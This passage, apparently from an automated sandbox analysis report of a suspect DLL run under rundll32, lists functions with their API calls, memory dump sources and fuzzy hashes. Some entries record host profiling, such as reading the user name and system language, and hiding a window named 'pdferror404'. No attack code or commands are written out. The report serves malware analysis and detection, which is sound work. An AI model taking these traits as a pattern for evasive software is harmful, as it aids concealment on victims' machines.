                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: File$AttributesCloseCreateHandle
                    • String ID:
                    • API String ID: 4216088276-0
                    • Opcode ID: 5cd25c42511335ccadbfd4c047ec9eb1a6a081c3daaa287d8c24302a5c52f87b
                    • Instruction ID: 929dda3357e65b17815f7044d1e4610f15cbbf4b6e90c668bf22aa9c965f204d
                    • Opcode Fuzzy Hash: 5cd25c42511335ccadbfd4c047ec9eb1a6a081c3daaa287d8c24302a5c52f87b
                    • Instruction Fuzzy Hash: 9E01D433B8631879F630506C5F8AFAA21484B6F76CF320637BF68FBAC0C6D468455214
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB7D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 538 6c9db7d0-6c9db7fd FindWindowW 539 6c9db7ff-6c9db805 ShowWindow 538->539 540 6c9db80a-6c9db827 538->540 539->540
                    APIs
                    • FindWindowW.USER32(#32770,pdferror404), ref: 6C9DB7F1
                    • ShowWindow.USER32(00000000,00000000,00000000,6C9DB814), ref: 6C9DB805
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Window$FindShow
                    • String ID: #32770$pdferror404
                    • API String ID: 734913111-3799891402
                    • Opcode ID: 6d06fa5dfea112cfc58ed9cb5f20a6d20724f89d91c77b03404614768e87ac74
                    • Instruction ID: fd82fcb3dad98dea6b53e42c674dd74fa130532aab16ddec4a076f263e3300a2
                    • Opcode Fuzzy Hash: 6d06fa5dfea112cfc58ed9cb5f20a6d20724f89d91c77b03404614768e87ac74
                    • Instruction Fuzzy Hash: 59F0EC31508604BEE7114A95EC55E9E7BBCE785675F2388F6F400E3D80E631B540C574
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7F14E4 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,6C7F15BE,?,00000000), ref: 6C7F1526
                    • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,6C7F159F,?,00000000,?,00000000,6C7F15BE,?,00000000), ref: 6C7F155B
                    • VerQueryValueW.VERSION(?,6C7F15D0,?,?,00000000,?,00000000,?,00000000,6C7F159F,?,00000000,?,00000000,6C7F15BE), ref: 6C7F1575
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileInfoVersion$QuerySizeValue
                    • String ID:
                    • API String ID: 2179348866-0
                    • Opcode ID: 55f17bb70cfbd27d302ca09f52e252f5156b0dc11e27ac5bcbb5325d7a25b7a3
                    • Instruction ID: 4d4170477803384d92d26184ba7653a55843e6bcf1dfd89a1581768162ff9301
                    • Opcode Fuzzy Hash: 55f17bb70cfbd27d302ca09f52e252f5156b0dc11e27ac5bcbb5325d7a25b7a3
                    • Instruction Fuzzy Hash: 1E2124B1A14209AFDB01CFA5CE94CAEB7FCEB49314B514875A421D3B50EB34EE05CA21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CFC20 Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetUserDefaultUILanguage.KERNEL32(00000000,6C7CFD39,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,6C7CFDC2,00000000,?,00000105), ref: 6C7CFCCB
                    • GetSystemDefaultUILanguage.KERNEL32(00000000,6C7CFD39,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,6C7CFDC2,00000000,?,00000105), ref: 6C7CFCF3
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: DefaultLanguage$SystemUser
                    • String ID:
                    • API String ID: 384301227-0
                    • Opcode ID: 711f509625f0cb817d142b3626c3afb2a61868700c93a23c9cb2e81cbe090747
                    • Instruction ID: 080aba785bf254d1a02e9634cefa345c5a3c2c363d33e85a089caade31a88845
                    • Opcode Fuzzy Hash: 711f509625f0cb817d142b3626c3afb2a61868700c93a23c9cb2e81cbe090747
                    • Instruction Fuzzy Hash: DB313030B0020B9FDB10DFA8CA99BDEB7B9EF45318F104966D410A7B50D774AE89CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CFD48 Relevance: 3.1, APIs: 2, Instructions: 56libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,6C7CFE04,?,6C7C0000,6CD4EC54,?,6C7CEAB4,6C7C0000,?,00000105,6C7C0000,6CD4EC54,6C7CEAF4), ref: 6C7CFD84
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,6C7CFE04,?,6C7C0000,6CD4EC54,?,6C7CEAB4,6C7C0000,?,00000105), ref: 6C7CFDD5
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName
                    • String ID:
                    • API String ID: 1159719554-0
                    • Opcode ID: 5f0ad7821e4fbf13679b5ae91b5e3b0427b81d92ceb32ffd5ff874ccb668ecec
                    • Instruction ID: 2561406674546f18c94d6b1dad483ee04787a7f5dd457b2798498c6b6bccf702
                    • Opcode Fuzzy Hash: 5f0ad7821e4fbf13679b5ae91b5e3b0427b81d92ceb32ffd5ff874ccb668ecec
                    • Instruction Fuzzy Hash: 34114230B4421D9FDB10DB50DE99BDEB3B8DB58704F1144A6E508E3790DB705F849AA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB784 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSystemDefaultLangID.KERNEL32 ref: 6C9DB79A
                    • VerLanguageNameW.KERNEL32(?,?,000000FA), ref: 6C9DB7B3
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: DefaultLangLanguageNameSystem
                    • String ID:
                    • API String ID: 2685979248-0
                    • Opcode ID: b498eadddab7a71f4294ef9befd8a01c5003286b57a35ea8520a8fff371455d3
                    • Instruction ID: fcbb6567c4b70161923090351aa7b1874031abe71ec8a783e7ce5ce0eb8bd9da
                    • Opcode Fuzzy Hash: b498eadddab7a71f4294ef9befd8a01c5003286b57a35ea8520a8fff371455d3
                    • Instruction Fuzzy Hash: 15F0C271E10149AFCF40DFE9D9889DDB7F8AB09204F6086A5B528E7754EB30AE04CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9B1BF4 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                    Download Yara Rule
                    APIs
                    • FlatSB_SetScrollInfo.COMCTL32(00000000,0000001C,0000001C,000000FF,00000000,?,00000000), ref: 6C9B1CB7
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FlatInfoScroll
                    • String ID:
                    • API String ID: 3347635785-0
                    • Opcode ID: 98959f398bf64ef2133e2155c750254294520e11a25b841387f471d5c158a580
                    • Instruction ID: 7819f7ef1d4fd474a1d935ddcccd5499cd3b492f334f70fb81dac89e202a8ec8
                    • Opcode Fuzzy Hash: 98959f398bf64ef2133e2155c750254294520e11a25b841387f471d5c158a580
                    • Instruction Fuzzy Hash: BB418974A041449FD714CF6DC080A9AFBF6AF6D304F2545ADE488E7362D335EA44CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9B20DC Relevance: 1.6, APIs: 1, Instructions: 86windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000085,00000000,00000000), ref: 6C9B21EB
                      • Part of subcall function 6C9B1BF4: FlatSB_SetScrollInfo.COMCTL32(00000000,0000001C,0000001C,000000FF,00000000,?,00000000), ref: 6C9B1CB7
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FlatInfoMessageScrollSend
                    • String ID:
                    • API String ID: 1818652896-0
                    • Opcode ID: 06177b1fef7b062951bf8f72fa6481be48a244bdb70a7c25096e0fb80296d82c
                    • Instruction ID: 9ef5c2ca58225c8e0db0bb59456f1eb31ebadb903b882ee61b9f87637a6a2c6e
                    • Opcode Fuzzy Hash: 06177b1fef7b062951bf8f72fa6481be48a244bdb70a7c25096e0fb80296d82c
                    • Instruction Fuzzy Hash: F4314F34A05244AFDB44DB68C598FEE73F5EF2A308F2544E4E408AB765CB31EE05D600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C955794 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                    • GetTextExtentPointW.GDI32(00000000,00000034,00000034,?), ref: 6C9557D5
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: ExtentPointText
                    • String ID:
                    • API String ID: 566491939-0
                    • Opcode ID: 5e92ceb06014d0c13e568eda4529e903e06f5f72df9de45c8ceafb6b1574b187
                    • Instruction ID: 541fb602fc28176233e475d6ffcd31bdb7bf2001737f0a920f4acbdb67493d6e
                    • Opcode Fuzzy Hash: 5e92ceb06014d0c13e568eda4529e903e06f5f72df9de45c8ceafb6b1574b187
                    • Instruction Fuzzy Hash: 5EF0E2306112019BC710DEA8CC819CA73DEDF8A265F880A62E545CB355FA789945C746
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9273F0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 6C92742B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: d7a871c88d4153dccb1c63dc9ab3dc184f0c58e72f3079b477b69c5e8c8ea066
                    • Instruction ID: 525a632bfe21f7ea86bbe811024700e1cf09362f4abf89f902f7784deabae12c
                    • Opcode Fuzzy Hash: d7a871c88d4153dccb1c63dc9ab3dc184f0c58e72f3079b477b69c5e8c8ea066
                    • Instruction Fuzzy Hash: 06F0D4362042019FC704DF5CC8C498E7BE5FF89255F044AA9F999DB366CA31E859CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB2F4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(00000000,00000400), ref: 6C9DB31E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 3f8a608f9548cf6559d0663c82cd03136b55902c2bc75a67c6dc93685650bb8b
                    • Instruction ID: 0998ace4a1fa2387f3c6aaada3da80e3147649c1a1f8639fc938a81861a4df17
                    • Opcode Fuzzy Hash: 3f8a608f9548cf6559d0663c82cd03136b55902c2bc75a67c6dc93685650bb8b
                    • Instruction Fuzzy Hash: 1FF0F830A0550AEFDB10DBE8C68D9DEB7B9AB00318F2041A1A414A7B54DB30FB499B56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CEA88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
